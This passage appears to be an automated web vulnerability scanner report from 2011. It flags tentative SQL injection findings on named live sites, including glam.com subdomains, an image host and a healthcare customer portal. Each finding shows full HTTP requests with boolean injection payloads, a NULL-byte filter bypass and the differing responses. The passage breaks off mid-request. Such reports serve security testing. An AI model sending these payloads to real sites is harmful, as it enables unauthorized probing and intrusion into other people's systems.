Confidence:   Tentative
Host:   http://celebrities.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 18059503%20or%201%3d1--%20 and 18059503%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=118059503%20or%201%3d1--%20 HTTP/1.1
Host: celebrities.glam.com
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:08:52 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026480834
Expires: Mon, 02 May 2011 13:08:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:08:54 GMT
Connection: close
Set-Cookie: PHPSESSID=0sl1r9qqlf0h91p2it3aduov93; path=/
Content-Length: 20918

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a 
href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onmou
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=118059503%20or%201%3d2--%20 HTTP/1.1
Host: celebrities.glam.com
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:08:55 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026480939
Expires: Mon, 02 May 2011 13:08:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:08:55 GMT
Connection: close
Set-Cookie: PHPSESSID=0me0tu8l8lc0npr6e7i4tr34q0; path=/
Content-Length: 2293

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://news.glam.com/' title='News'>News</a></li><li class=''><a href='http://style.glam.com/' title='Style'>Style</a></li><li class=''><a href='http://alist.glam.com/' title='A-List'>A-List</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a 
href='http://celebrities.gl
...[SNIP]...

1.5. http://cr0.worthathousandwords.com/8/B0/97/12F97D19102C47E09DCCA28EA33.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cr0.worthathousandwords.com
Path:   /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /8/B0/97%20and%201%3d1--%20/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2778
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:29 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[HttpException]
at System.Web.CachedPathData.GetPhysicalPath(VirtualPath virtualPath)
at System.Web.CachedPathData.GetConfigPathData(String configPath)
at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
at System.Web.HttpContext.GetFilePathData()
at System.Web.HttpContext.GetConfigurationPathData()
at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
at System.Web.HttpContext.ReportRuntimeErrorIfExists(RequestNotificationStatus& status)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->

Request 2

GET /8/B0/97%20and%201%3d2--%20/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2720
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:29 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082

</font>

</body>
</html>
<!--
[HttpException]
at System.Web.CachedPathData.GetConfigPathData(String configPath)
at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
at System.Web.HttpContext.GetFilePathData()
at System.Web.HttpContext.GetConfigurationPathData()
at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
at System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->

1.6. http://cr0.worthathousandwords.com/8/B0/97/12F97D19102C47E09DCCA28EA33.jpg [pid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cr0.worthathousandwords.com
Path:   /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200%00'&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 5181
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>A potentially dangerous Request.QueryString value was detected from the client (qs=&quot;...!2&amp;Vrrjf%7&lt;B;&quot;).</title>
<style>
body {fon
...[SNIP]...
<b> Exception Details: </b>
...[SNIP]...
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>
...[SNIP]...

Request 2

GET /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200%00''&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: image/jpg
Content-Length: 4894
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:18 GMT
Connection: close

......JFIF.....`.`.....C.......................

............................... "..".......C.....................................................................d.d.."..............................
...[SNIP]...

1.7. http://cr0.worthathousandwords.com/C/AE/42/DF69B0E03BBF9D28DDBF2CEA27A.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cr0.worthathousandwords.com
Path:   /C/AE/42/DF69B0E03BBF9D28DDBF2CEA27A.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /C/AE/42%20and%201%3d1--%20/DF69B0E03BBF9D28DDBF2CEA27A.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwB%7Dz%C2%802OQ3irv*%7BuqCKY%24%27!ftg%29LPQFG%29miz%3EQkd%7Br%27Ntxh%29Eipzz%23QMWBF%26Fxqwmngqli5!Wkdm%24%7Bij%26KY%24%5Einzh%29Thqjx%23Ws~%22 HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2720
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082

</font>

</body>
</html>
<!--
[HttpException]
at System.Web.CachedPathData.GetConfigPathData(String configPath)
at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
at System.Web.HttpContext.GetFilePathData()
at System.Web.HttpContext.GetConfigurationPathData()
at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
at System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->

Request 2

GET /C/AE/42%20and%201%3d2--%20/DF69B0E03BBF9D28DDBF2CEA27A.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwB%7Dz%C2%802OQ3irv*%7BuqCKY%24%27!ftg%29LPQFG%29miz%3EQkd%7Br%27Ntxh%29Eipzz%23QMWBF%26Fxqwmngqli5!Wkdm%24%7Bij%26KY%24%5Einzh%29Thqjx%23Ws~%22 HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2778
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[HttpException]
at System.Web.CachedPathData.GetPhysicalPath(VirtualPath virtualPath)
at System.Web.CachedPathData.GetConfigPathData(String configPath)
at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
at System.Web.HttpContext.GetFilePathData()
at System.Web.HttpContext.GetConfigurationPathData()
at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
at System.Web.HttpContext.ReportRuntimeErrorIfExists(RequestNotificationStatus& status)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->

1.8. https://customer.trizetto.com/OnyxCustomerPortal/home.asp [ASPSESSIONIDQSASBQTR cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://customer.trizetto.com
Path:   /OnyxCustomerPortal/home.asp

Issue detail

The ASPSESSIONIDQSASBQTR cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDQSASBQTR cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /OnyxCustomerPortal/home.asp HTTP/1.1
Host: customer.trizetto.com
Connection: keep-alive
Referer: https://customer.trizetto.com/OnyxCustomerPortal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionData=OCPUserId=&UserAccessLevel=&CustomerType=&CompanyId=0&LangCode=&IndividualId=0; ocpDate=gsTimeFormat=hh%3Amm&gsDateFormat=yyyy%2FMM%2Fdd&gsTimeSeparator=%3A&gsDateSeparator=%2F&gsIs24Hour=1&gsDateOrder=YMD; __utmz=29614586.1304367986.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=29614586.1608591266.1304367986.1304367986.1304367986.1; __utmc=29614586; __utmb=29614586.6.10.1304367986; ASPSESSIONIDQSASBQTR=CEKFFMDDCFNNAGOMJMBNIEDJ'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:49:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2392
Content-Type: text/html; Charset=UTF-8
Expires: Mon, 02 May 2011 15:49:33 GMT
Set-Cookie: CustPersist=; expires=Tue, 01-May-2012 06:00:00 GMT; path=/OnyxCustomerPortal
Set-Cookie: ASPSESSIONIDQSCTARTR=LENPHMDDGIMEPGCGEACILGDD; path=/
Cache-control: private



<HTML>

<HEAD>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="main.css">
<TITLE>Customer Portal Home Page</TITLE>
</HEAD>

<BODY>

<table border="0" width="100%" cellspacing="0" cellpadding="5px" height="100%">
<tr>
<td class="LeftBorder" bgcolor="#002073" valign="top" width="160px">
   <table border="0" width="100%">
<tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="about.asp">About Us</a></td>
</tr><tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="customer/customer.asp">Update Profile</a></td>
</tr><tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="incident/incidentList_support.asp">Support Requests</a></td>
</tr>
   <tr>
   <td width="100%" height="250">&nbsp;</td>
   </tr>
<TR>
<TD VALIGN="BOTTOM">
&nbsp;

</TD>
</TR>
   </table>
</td>

<td class="MainBody" bgcolor="#FFFFFF" valign="top">
<H2>Welcome!</H2>
Already registered? Please <A HREF='login.asp'>login.</A><BR><BR>
If you don't have a login to the TriZetto Customer Support Interface and would like one, please contact your TriZetto Customer Support Representative.<BR>

<BR><BR>
<align="center"><B><FONT SIZE=4><B>Onyx Use Agreement</B></FONT></B>
<BR><BR>
<width="95%" align="left">You may now attach documents to your support request. Since attachments that you submit may contain protected health information (PHI) or other confidential or proprietary information, TriZetto is requiring that you use a unique user ID and a strong password when accessing ONYX. Do not share your user ID or password with anyone else.<BR><BR>TriZetto&rsquo;s password policy requires that a strong passwo
...[SNIP]...

Request 2

GET /OnyxCustomerPortal/home.asp HTTP/1.1
Host: customer.trizetto.com
Connection: keep-alive
Referer: https://customer.trizetto.com/OnyxCustomerPortal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionData=OCPUserId=&UserAccessLevel=&CustomerType=&CompanyId=0&LangCode=&IndividualId=0; ocpDate=gsTimeFormat=hh%3Amm&gsDateFormat=yyyy%2FMM%2Fdd&gsTimeSeparator=%3A&gsDateSeparator=%2F&gsIs24Hour=1&gsDateOrder=YMD; __utmz=29614586.1304367986.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=29614586.1608591266.1304367986.1304367986.1304367986.1; __utmc=29614586; __utmb=29614586.6.10.1304367986; ASPSESSIONIDQSASBQTR=CEKFFMDDCFNNAGOMJMBNIEDJ'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:49:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2392
Content-Type: text/html; Charset=UTF-8
Expires: Mon, 02 May 2011 15:49:34 GMT
Set-Cookie: CustPersist=; expires=Tue, 01-May-2012 06:00:00 GMT; path=/OnyxCustomerPortal
Cache-control: private



<HTML>

<HEAD>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="main.css">
<TITLE>Customer Portal Home Page</TITLE>
</HEAD>

<BODY>

<table border="0" width="100%" cellspacing="0" cellpadding="5px" height="100%">
<tr>
<td class="LeftBorder" bgcolor="#002073" valign="top" width="160px">
   <table border="0" width="100%">
<tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="about.asp">About Us</a></td>
</tr><tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="customer/customer.asp">Update Profile</a></td>
</tr><tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="incident/incidentList_support.asp">Support Requests</a></td>
</tr>
   <tr>
   <td width="100%" height="250">&nbsp;</td>
   </tr>
<TR>
<TD VALIGN="BOTTOM">
&nbsp;

</TD>
</TR>
   </table>
</td>

<td class="MainBody" bgcolor="#FFFFFF" valign="top">
<H2>Welcome!</H2>
Already registered? Please <A HREF='login.asp'>login.</A><BR><BR>
If you don't have a login to the TriZetto Customer Support Interface and would like one, please contact your TriZetto Customer Support Representative.<BR>

<BR><BR>
<align="center"><B><FONT SIZE=4><B>Onyx Use Agreement</B></FONT></B>
<BR><BR>
<width="95%" align="left">You may now attach documents to your support request. Since attachments that you submit may contain protected health information (PHI) or other confidential or proprietary information, TriZetto is requiring that you use a unique user ID and a strong password when accessing ONYX. Do not share your user ID or password with anyone else.<BR><BR>TriZetto&rsquo;s password policy requires that a strong password consist of at least eight (8) characters and contain three of th
...[SNIP]...

1.9. http://designers.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://designers.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 83147941%20or%201%3d1--%20 and 83147941%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=183147941%20or%201%3d1--%20 HTTP/1.1
Host: designers.glam.com
Proxy-Connection: keep-alive
Referer: http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
